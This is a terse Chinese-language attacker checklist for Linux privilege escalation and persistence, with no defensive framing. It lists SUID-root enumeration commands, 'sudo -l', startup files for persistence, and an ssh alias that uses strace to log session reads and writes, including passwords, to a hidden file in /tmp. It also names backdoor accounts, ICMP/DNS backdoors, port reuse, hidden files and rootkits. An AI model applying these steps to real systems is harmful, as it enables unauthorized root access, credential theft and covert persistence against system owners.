内核漏洞利用
攻击有root权限的服务
利用第三方服务提权
查找可能提权的可执行文件
find / -perm +4000 -ls
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
sudo -l
利用误配置的 crontab 任务
/etc/init.d
/etc/rc.d/rc.local
~/.bashrc
~/.zshrc
alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'
后门账户
ICMP
DNS
icmp后门
后门端口复用
.
开头隐藏文件
rootkit